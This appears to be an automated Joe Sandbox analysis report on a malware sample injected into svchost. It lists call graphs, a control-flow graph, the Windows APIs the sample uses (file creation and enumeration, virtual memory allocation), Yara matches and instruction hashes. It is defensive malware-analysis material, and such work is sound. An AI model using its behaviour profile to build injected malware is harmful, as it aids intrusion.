101030 29c7f74 101027->101030 101031 29d9520 NtClose 101027->101031 101029 29c7f9d 101028->101029 101032 29d9520 NtClose 101028->101032 101029->101010 101030->101010 101031->101030 101033 29c7f93 101032->101033 101033->101010 101035 29d8072 101034->101035 101036 29d807f 101035->101036 101039 29c1d70 101035->101039 101036->101011 101038->101021 101055 29c81e0 101039->101055 101041 29c1d90 101048 29c22f0 101041->101048 101059 29d1200 101041->101059 101044 29c1fa4 101046 29dc790 2 API calls 101044->101046 101045 29c1dee 101045->101048 101062 29dc660 101045->101062 101049 29c1fb9 101046->101049 101047 29c8180 LdrInitializeThunk 101051 29c2009 101047->101051 101048->101036 101049->101051 101067 29c0890 101049->101067 101051->101047 101051->101048 101052 29c0890 LdrInitializeThunk 101051->101052 101052->101051 101053 29c2160 101053->101051 101054 29c8180 LdrInitializeThunk 101053->101054 101054->101053 101056 29c81ed 101055->101056 101057 29c820e SetErrorMode 101056->101057 101058 29c8215 101056->101058 101057->101058 101058->101041 101071 29db530 101059->101071 101061 29d1221 101061->101045 101063 29dc676 101062->101063 101064 29dc670 101062->101064 101065 29db6a0 RtlAllocateHeap 101063->101065 101064->101044 101066 29dc69c 101065->101066 101066->101044 101068 29c089c 101067->101068 101078 29d9790 101068->101078 101074 29d9670 101071->101074 101073 29db561 101073->101061 101075 29d9705 101074->101075 101077 29d969b 101074->101077 101076 29d9718 NtAllocateVirtualMemory 101075->101076 101076->101073 101077->101073 101079 29d97ad 101078->101079 101082 3772c70 LdrInitializeThunk 101079->101082 101080 29c08b2 101080->101053 101082->101080 101083 29c5c30 101084 29c8180 LdrInitializeThunk 101083->101084 101085 29c5c60 101084->101085 101087 29c5c8c 101085->101087 101088 29c8100 101085->101088 101089 29c8144 101088->101089 101094 29c8165 101089->101094 101095 29d8890 101089->101095 101091 29c8155 101092 29c8171 101091->101092 101093 29d9520 NtClose 101091->101093 101092->101085 101093->101094 101094->101085 101096 29d88b8 101095->101096 101097 29d890a 101095->101097 101096->101091 101100 3774650 LdrInitializeThunk 101097->101100 101098 29d892c 101098->101091 101100->101098 101101 29c71b0 101102 29c71cc 101101->101102 101105 29c721f 101101->101105 101103 29d9520 NtClose 101102->101103 101102->101105 101104 29c71e7 101103->101104 101111 29c65d0 NtClose LdrInitializeThunk LdrInitializeThunk 101104->101111 101106 29c7351 101105->101106 101112 29c65d0 NtClose LdrInitializeThunk LdrInitializeThunk 101105->101112 101109 29c7331 101109->101106 101113 29c67a0 NtClose LdrInitializeThunk LdrInitializeThunk 101109->101113 101111->101105 101112->101109 101113->101106 101114 29d9230 101115 29d92e4 101114->101115 101116 29d925c 101114->101116 101117 29d92f7 NtCreateFile 101115->101117 101271 29d89f0 101272 29d8a7f 101271->101272 101274 29d8a1b 101271->101274 101276 3772ee0 LdrInitializeThunk 101272->101276 101273 29d8aad 101276->101273 101282 29d8b70 101283 29d8b8a 101282->101283 101286 3772df0 LdrInitializeThunk 101283->101286 101284 29d8baf 101286->101284 101123 29c88a4 101124 29c88b4 101123->101124 101125 29c8820 101124->101125 101127 29c7130 101124->101127 101128 29c7146 101127->101128 101130 29c717f 101127->101130 101128->101130 101131 29c6fa0 LdrLoadDll 101128->101131 101130->101125 101131->101130 101287 29cf8e0 101288 29cf944 101287->101288 101289 29c6340 2 API calls 101288->101289 101291 29cfa77 101289->101291 101290 29cfa7e 101291->101290 101316 29c6450 101291->101316 101293 29cfc23 101294 29cfafa 101294->101293 101295 29cfc32 101294->101295 101320 29cf6c0 101294->101320 101296 29d9520 NtClose 101295->101296 101298 29cfc3c 101296->101298 101299 29cfb36 101299->101295 101300 29cfb41 101299->101300 101301 29db6a0 RtlAllocateHeap 101300->101301 101302 29cfb6a 101301->101302 101303 29cfb89 101302->101303 101304 29cfb73 101302->101304 101329 29cf5b0 CoInitialize 101303->101329 101306 29d9520 NtClose 101304->101306 101308 29cfb7d 101306->101308 101307 29cfb97 101332 29d9010 101307->101332 101310 29cfc12 101311 29d9520 NtClose 101310->101311 101312 29cfc1c 101311->101312 101314 29db5c0 RtlFreeHeap 101312->101314 101313 29cfbb5 101313->101310 101315 29d9010 LdrInitializeThunk 101313->101315 101314->101293 101315->101313 101317 29c6475 101316->101317 101336 29d8ed0 101317->101336 101321 29cf6dc 101320->101321 101322 29c45c0 LdrLoadDll 101321->101322 101324 29cf6fa 101322->101324 101323 29cf703 101323->101299 101324->101323 101325 29c45c0 LdrLoadDll 101324->101325 101326 29cf7ce 101325->101326 101327 29c45c0 LdrLoadDll 101326->101327 101328 29cf82b 101326->101328 101327->101328 101328->101299 101331 29cf615 101329->101331 101330 29cf6ab CoUninitialize 101330->101307 101331->101330 101333 29d902d 101332->101333 101341 3772ba0 LdrInitializeThunk 101333->101341 101334 29d905a 101334->101313 101337 29d8eea 101336->101337 101340 3772c60 LdrInitializeThunk 101337->101340 101338 29c64e9 101338->101294 101340->101338 101341->101334 101342 29cc660 101344 29cc689 101342->101344 101343 29cc78d 101344->101343 101345 29cc733 FindFirstFileW 101344->101345 101345->101343 101347 29cc74e 101345->101347 101346 29cc774 FindNextFileW 101346->101347 101348 29cc786 FindClose 101346->101348 101347->101346 101348->101343 101349 29d01e0 101350 29d01fd 101349->101350 101351 29c45c0 LdrLoadDll 101350->101351 101352 29d021b 101351->101352

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 27 29b9eb0-29ba1be 28 29ba1cf-29ba1db 27->28 29 29ba1eb-29ba1f2 28->29 30 29ba1dd-29ba1e9 28->30 32 29ba1f9-29ba200 29->32 30->28 33 29ba202-29ba21f 32->33 34 29ba221-29ba232 32->34 33->32 35 29ba243-29ba24d 34->35 36 29ba27b-29ba285 35->36 37 29ba24f-29ba279 35->37 38 29ba296-29ba2a0 36->38 37->35 40 29ba2a2-29ba2b4 38->40 41 29ba2b6-29ba2ba 38->41 40->38 42 29ba2e8-29ba2f1 41->42 43 29ba2bc-29ba2e6 41->43 45 29ba519-29ba520 42->45 46 29ba2f7-29ba301 42->46 43->41 48 29ba552-29ba55c 45->48 49 29ba522-29ba550 45->49 47 29ba312-29ba31e 46->47 50 29ba331-29ba338 47->50 51 29ba320-29ba32f 47->51 52 29ba56d-29ba579 48->52 49->45 56 29ba33a-29ba34c 50->56 57 29ba362-29ba36c 50->57 51->47 53 29ba57b-29ba58d 52->53 54 29ba58f-29ba596 52->54 53->52 59 29ba638-29ba651 54->59 60 29ba59c-29ba5a6 54->60 61 29ba34e-29ba352 56->61 62 29ba353-29ba355 56->62 63 29ba37d-29ba389 57->63 59->59 69 29ba653-29ba65a 59->69 66 29ba5b7-29ba5c0 60->66 61->62 67 29ba360 62->67 68 29ba357-29ba35d 62->68 64 29ba38b-29ba397 63->64 65 29ba3a7-29ba3b1 63->65 70 29ba399-29ba39f 64->70 71 29ba3a5 64->71 76 29ba3c2-29ba3ce 65->76 74 29ba5de call 29db220 66->74 75 29ba5c2-29ba5ce 66->75 67->50 68->67 72 29ba68c-29ba690 69->72 73 29ba65c-29ba68a 69->73 70->71 71->63 78 29ba6ab-29ba6b5 72->78 79 29ba692-29ba6a9 72->79 73->69 90 29ba5e3-29ba5e7 74->90 80 29ba5dc 75->80 81 29ba5d0-29ba5d6 75->81 82 29ba3d0-29ba3d9 76->82 83 29ba3e6-29ba3f0 76->83 79->72 87 29ba5a8-29ba5b1 80->87 81->80 85 29ba3db-29ba3de 82->85 86 29ba3e4 82->86 88 29ba3f2-29ba411 83->88 89 29ba424-29ba427 83->89 85->86 86->76 87->66 92 29ba413-29ba41c 88->92 93 29ba422 88->93 96 29ba42d-29ba431 89->96 94 29ba5e9-29ba60e 90->94 95 29ba610-29ba617 90->95 92->93 93->83 94->90 95->59 97 29ba619-29ba636 95->97 98 29ba433-29ba450 96->98 99 29ba452-29ba456 96->99 97->95 98->96 100 29ba458-29ba47c 99->100 101 29ba47e-29ba48d 99->101 100->99 102 29ba48f 101->102 103 29ba494-29ba49b 101->103 102->45 104 29ba4cd-29ba4e1 103->104 105 29ba49d-29ba4cb 103->105 106 29ba4f2-29ba4fe 104->106 105->103 107 29ba500-29ba512 106->107 108 29ba514 106->108 107->106 108->42
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.3359528997.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 029B0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_29b0000_svchost.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 0$ }$!$,$/$1A$:t$;I$;X$@$Az$C$ER$Ex$L2M+$^$aG$n$n$r$v $wz${$~$r$r
                                                                            • API String ID: 0-708521815
                                                                            • Opcode ID: bba8c3ae23ac075a89c746f42d7cd9cdebbc630fcd0c64b6f53c9c3079c364d0
                                                                            • Instruction ID: 79d1abe00f74064a2ce64fc6b8fb509c4130c6f2bc58e69ed6f5aed3c78fc14c
                                                                            • Opcode Fuzzy Hash: bba8c3ae23ac075a89c746f42d7cd9cdebbc630fcd0c64b6f53c9c3079c364d0
                                                                            • Instruction Fuzzy Hash: 2E22C0B0D05228CBEB25CF48CA987DDBBB2BF84308F1085DAD1496B291C7B95A85CF55
                                                                            APIs
                                                                            • FindFirstFileW.KERNELBASE(?,00000000), ref: 029CC744
                                                                            • FindNextFileW.KERNELBASE(?,00000010), ref: 029CC77F
                                                                            • FindClose.KERNELBASE(?), ref: 029CC78A
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.3359528997.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 029B0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_29b0000_svchost.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Find$File$CloseFirstNext
                                                                            • String ID:
                                                                            • API String ID: 3541575487-0
                                                                            • Opcode ID: a79b9ece9e244eaacd4845b3d18c23b5cd9f47a4c4a4db4bf35e8d07d9255b89
                                                                            • Instruction ID: 82f5feb0ae838145545b87dd230dab620d5f3ed93d9e069becebd5d958b8e220
                                                                            • Opcode Fuzzy Hash: a79b9ece9e244eaacd4845b3d18c23b5cd9f47a4c4a4db4bf35e8d07d9255b89
                                                                            • Instruction Fuzzy Hash: 623150759002097BDB21EFA4CC85FFB777DEF84744F24459DBA0CA6190D770AA848BA1
                                                                            APIs
                                                                            • NtCreateFile.NTDLL(?,?,?,000000F6,?,?,?,?,?,?,?), ref: 029D9328
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.3359528997.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 029B0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_29b0000_svchost.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CreateFile
                                                                            • String ID:
                                                                            • API String ID: 823142352-0
                                                                            • Opcode ID: 943abc6d6a962a54a79e46a8e17846a86339e37f1ea7195e364c9e77f6308ce1
                                                                            • Instruction ID: b4c0cdc97a6e0c956d3bc16c9fbdf5626e5f9ed3793fde7ad89e2ba4bc843216
                                                                            • Opcode Fuzzy Hash: 943abc6d6a962a54a79e46a8e17846a86339e37f1ea7195e364c9e77f6308ce1
                                                                            • Instruction Fuzzy Hash: AC3195B5A00648AFDB14DF98D880EEEB7F9EF88714F108219F919A7344D730A951CFA5
                                                                            APIs
                                                                            • NtReadFile.NTDLL(?,?,?,000000F6,?,?,?,?,?), ref: 029D9473
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.3359528997.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 029B0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_29b0000_svchost.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FileRead
                                                                            • String ID:
                                                                            • API String ID: 2738559852-0
                                                                            • Opcode ID: b7f1b19bae1833c49a946c7fba1103e696fa9b0267a1a5d0d3544ce55816e37e
                                                                            • Instruction ID: 3de72244cd11a65429fcfb1db07099c379a93cf5bea3be983a52c7f3c97317e3
                                                                            • Opcode Fuzzy Hash: b7f1b19bae1833c49a946c7fba1103e696fa9b0267a1a5d0d3544ce55816e37e
                                                                            • Instruction Fuzzy Hash: F631D8B5A00248AFDB14DF98D880EEFB7B9EF88714F108619FD18A7344D730A9518FA1
                                                                            APIs
                                                                            • NtAllocateVirtualMemory.NTDLL(029C1DEE,?,029D807F,00000000,00000004,00003000,?,?,?,?,?,029D807F,029C1DEE), ref: 029D9735
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.3359528997.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 029B0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_29b0000_svchost.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AllocateMemoryVirtual
                                                                            • String ID:
                                                                            • API String ID: 2167126740-0
                                                                            • Opcode ID: f915eb28ae2039f1a9b4e0d9c0d2c3b02de51cec562ba8e2b1efbf4d73026005
                                                                            • Instruction ID: a5075cf497894214f2f5bd9112ca0b5ad055ece0ee1eace2d0dc7b8f3198f8b0
                                                                            • Opcode Fuzzy Hash: f915eb28ae2039f1a9b4e0d9c0d2c3b02de51cec562ba8e2b1efbf4d73026005
                                                                            • Instruction Fuzzy Hash: D221FDB5A00249ABDB10DF98CC91EEFB7B9EF89710F108659FD18A7244D770A9118FA1
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.3359528997.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 029B0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_29b0000_svchost.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: DeleteFile
                                                                            • String ID:
                                                                            • API String ID: 4033686569-0
                                                                            • Opcode ID: ca5fb79d41cc8b6e2c0132a612284b4b438bf8adf110cb35009967c8a8a4f33a
                                                                            • Instruction ID: 57037415508744fe6092f40d5916c720978ef0a4a21cc9eab6b7374014e9b9d9
                                                                            • Opcode Fuzzy Hash: ca5fb79d41cc8b6e2c0132a612284b4b438bf8adf110cb35009967c8a8a4f33a
                                                                            • Instruction Fuzzy Hash: 84115E75600608BAD620EA98CC41FEFB7ADDFC5714F008249FA186B280DB716A158BA5
                                                                            APIs
                                                                            • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 029D9551
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.3359528997.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 029B0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_29b0000_svchost.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Close
                                                                            • String ID:
                                                                            • API String ID: 3535843008-0
                                                                            • Opcode ID: 193f3562c9ccceffbf2ab8c981e63ac041f9aa8d1b0f16e9b97175512fe5262a
                                                                            • Instruction ID: 53efc4ae2984b8b88562fb07fcbbb01c7406c437644350e8b8d7a29ff3e4e82f
                                                                            • Opcode Fuzzy Hash: 193f3562c9ccceffbf2ab8c981e63ac041f9aa8d1b0f16e9b97175512fe5262a
                                                                            • Instruction Fuzzy Hash: DFE0463A2102047BC220FA99CC40FEB77AEEFC5728F008419FA08A7241C670B9118AF0
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.3361124338.0000000003700000.00000040.00001000.00020000.00000000.sdmp, Offset: 03700000, based on PE: true
                                                                            • Associated: 00000009.00000002.3361124338.0000000003829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000009.00000002.3361124338.000000000382D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000009.00000002.3361124338.000000000389E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_3700000_svchost.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: b76752e9f5434cb179dfa54d6d85e33a41b1bca4687c96c98d643869f289830a
                                                                            • Instruction ID: 05fffe6009b48b8d4f6e07590d557887869c02cf906eeb2b929b9577fbe785b9
                                                                            • Opcode Fuzzy Hash: b76752e9f5434cb179dfa54d6d85e33a41b1bca4687c96c98d643869f289830a
                                                                            • Instruction Fuzzy Hash: A690023164580422A140B25848C4586400697E0311B95C021E0424568C8B148A565363
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.3361124338.0000000003700000.00000040.00001000.00020000.00000000.sdmp, Offset: 03700000, based on PE: true
                                                                            • Associated: 00000009.00000002.3361124338.0000000003829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000009.00000002.3361124338.000000000382D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000009.00000002.3361124338.000000000389E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_3700000_svchost.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: a4bbb1f35bb45113d594037f9401d4297f15b2cdc2027e5a6c71013ac253bcd1
                                                                            • Instruction ID: 6a0941fc36506329a2e89c99a29ee79a11ee048d0f31ec650e56343573138238
                                                                            • Opcode Fuzzy Hash: a4bbb1f35bb45113d594037f9401d4297f15b2cdc2027e5a6c71013ac253bcd1
                                                                            • Instruction Fuzzy Hash: 65900261641504525140B2584884446600697E13113D5C125A0554574C87188955926B
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.3361124338.0000000003700000.00000040.00001000.00020000.00000000.sdmp, Offset: 03700000, based on PE: true
                                                                            • Associated: 00000009.00000002.3361124338.0000000003829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000009.00000002.3361124338.000000000382D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000009.00000002.3361124338.000000000389E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_3700000_svchost.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 6b3cf9f508192e3513ef992869777860b2de241ba919cbf17fe7175a3706a11f
                                                                            • Instruction ID: a3aad2bcd0e38a45d751b5b138e279c8a106b8958b6414968935ead586aa7d7b
                                                                            • Opcode Fuzzy Hash: 6b3cf9f508192e3513ef992869777860b2de241ba919cbf17fe7175a3706a11f
                                                                            • Instruction Fuzzy Hash: 5F900261242404135105B2584494656400B87E0311B95C031E10145A4DC62589916127
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.3361124338.0000000003700000.00000040.00001000.00020000.00000000.sdmp, Offset: 03700000, based on PE: true
                                                                            • Associated: 00000009.00000002.3361124338.0000000003829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000009.00000002.3361124338.000000000382D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000009.00000002.3361124338.000000000389E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_3700000_svchost.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: a14e21fc8008e8aed94b2d53e987089e3f04d7a0c432c934bcd0e036290fe68b
                                                                            • Instruction ID: 9a5925bce28e2386ef0b8278e1a22ee6bb631abbe33767e56e36bbb114696e12
                                                                            • Opcode Fuzzy Hash: a14e21fc8008e8aed94b2d53e987089e3f04d7a0c432c934bcd0e036290fe68b
                                                                            • Instruction Fuzzy Hash: 5D90023124140C12E180B258448468A000687D1311FD5C025A0025668DCB158B5977A3
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.3361124338.0000000003700000.00000040.00001000.00020000.00000000.sdmp, Offset: 03700000, based on PE: true
                                                                            • Associated: 00000009.00000002.3361124338.0000000003829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000009.00000002.3361124338.000000000382D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000009.00000002.3361124338.000000000389E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_3700000_svchost.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 7500c7b3512f2afbffc7407a1560330a76f4c4817d5a27f1c8a4ffbc687258ac
                                                                            • Instruction ID: f220c0daf812becec8621aa1efd7a1ccd81fdff2a4de1131941ddb4091aac903
                                                                            • Opcode Fuzzy Hash: 7500c7b3512f2afbffc7407a1560330a76f4c4817d5a27f1c8a4ffbc687258ac
                                                                            • Instruction Fuzzy Hash: 3790023124544C52E140B2584484A86001687D0315F95C021A00646A8D97258E55B663
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.3361124338.0000000003700000.00000040.00001000.00020000.00000000.sdmp, Offset: 03700000, based on PE: true
                                                                            • Associated: 00000009.00000002.3361124338.0000000003829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000009.00000002.3361124338.000000000382D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000009.00000002.3361124338.000000000389E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_3700000_svchost.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 718ccf7e70ef4ee38a643a70ed4972010d729708ff227f697d49ead1718332c9
                                                                            • Instruction ID: e5a1212d6694ca370ad98c13a48eb0bf217437f1dbc0a0d58f12e02b4e773847
                                                                            • Opcode Fuzzy Hash: 718ccf7e70ef4ee38a643a70ed4972010d729708ff227f697d49ead1718332c9
                                                                            • Instruction Fuzzy Hash: D690023164540C12E150B2584494786000687D0311F95C021A0024668D87558B5576A3
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.3361124338.0000000003700000.00000040.00001000.00020000.00000000.sdmp, Offset: 03700000, based on PE: true
                                                                            • Associated: 00000009.00000002.3361124338.0000000003829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000009.00000002.3361124338.000000000382D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000009.00000002.3361124338.000000000389E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_3700000_svchost.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: d29a484699121c308d442a2e5c4ad2368b7fc7121fa6670a17ca7b6293bc2a8f
                                                                            • Instruction ID: ded197d3f9cba5d86920a68cc985eef0fb208fcd234255c53002b61a0c5a2150
                                                                            • Opcode Fuzzy Hash: d29a484699121c308d442a2e5c4ad2368b7fc7121fa6670a17ca7b6293bc2a8f
                                                                            • Instruction Fuzzy Hash: 2B900225261404121145F658068454B044697D63613D5C025F14165A4CC72189655323
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.3361124338.0000000003700000.00000040.00001000.00020000.00000000.sdmp, Offset: 03700000, based on PE: true
                                                                            • Associated: 00000009.00000002.3361124338.0000000003829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000009.00000002.3361124338.000000000382D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000009.00000002.3361124338.000000000389E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_3700000_svchost.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: ce63914a5ccb7007c5aa190debe39b28dad9b63ef87979d579376e666cde2bcb
                                                                            • Instruction ID: 18477756366390eb8bcfc9bff1bcd009380bd4abe4c24940c1a9464f8d616fa4
                                                                            • Opcode Fuzzy Hash: ce63914a5ccb7007c5aa190debe39b28dad9b63ef87979d579376e666cde2bcb
                                                                            • Instruction Fuzzy Hash: F5900435351404131105F75C07C45470047C7D53713D5C031F1015574CD731CD715133
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.3361124338.0000000003700000.00000040.00001000.00020000.00000000.sdmp, Offset: 03700000, based on PE: true
                                                                            • Associated: 00000009.00000002.3361124338.0000000003829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000009.00000002.3361124338.000000000382D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000009.00000002.3361124338.000000000389E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_3700000_svchost.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: a93d7ff5dfcde7eaec789da5dd704bee97ab5c963ae74283f30227f0a087099c
                                                                            • Instruction ID: 3b8e130769b1a55ab52ec7f359914fba229cf944ccbb4d3d7997522583e4a766
                                                                            • Opcode Fuzzy Hash: a93d7ff5dfcde7eaec789da5dd704bee97ab5c963ae74283f30227f0a087099c
                                                                            • Instruction Fuzzy Hash: 6C90026138140852E100B2584494B460006C7E1311F95C025E1064568D8719CD526127
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.3361124338.0000000003700000.00000040.00001000.00020000.00000000.sdmp, Offset: 03700000, based on PE: true
                                                                            • Associated: 00000009.00000002.3361124338.0000000003829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000009.00000002.3361124338.000000000382D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000009.00000002.3361124338.000000000389E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_3700000_svchost.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 6344750bc5584d3abd0d18bea28701c1418635f1ebc76a4a0ff403d8b9b62758
                                                                            • Instruction ID: 5f54a04f2e30911417cff9dbfb65684457abed8ecfad4234ba124c91a8224550
                                                                            • Opcode Fuzzy Hash: 6344750bc5584d3abd0d18bea28701c1418635f1ebc76a4a0ff403d8b9b62758
                                                                            • Instruction Fuzzy Hash: 12900221251C0452E200B6684C94B47000687D0313F95C125A0154568CCA1589615523
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.3361124338.0000000003700000.00000040.00001000.00020000.00000000.sdmp, Offset: 03700000, based on PE: true
                                                                            • Associated: 00000009.00000002.3361124338.0000000003829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000009.00000002.3361124338.000000000382D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000009.00000002.3361124338.000000000389E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_3700000_svchost.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: f770f2acf3a64d57dac4534942823714aa702e74405310106a03862d22991b1b
                                                                            • Instruction ID: 9f8b13a80150b355350e4a9037193b3fa5f03776fa3fcaf67abb99798707f23e
                                                                            • Opcode Fuzzy Hash: f770f2acf3a64d57dac4534942823714aa702e74405310106a03862d22991b1b
                                                                            • Instruction Fuzzy Hash: D1900221641404525140B26888C49464006ABE1321795C131A0998564D865989655667
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.3361124338.0000000003700000.00000040.00001000.00020000.00000000.sdmp, Offset: 03700000, based on PE: true
                                                                            • Associated: 00000009.00000002.3361124338.0000000003829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000009.00000002.3361124338.000000000382D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000009.00000002.3361124338.000000000389E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_3700000_svchost.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 6d8dd45ff88646e9a641d5ed6b3a0c2dd00693d73719af8e355cd5c009434f0b
                                                                            • Instruction ID: dd82c02494d3b1a3c3ae9c93b7638e10850e81d38f5588d672be4634cb5a26bc
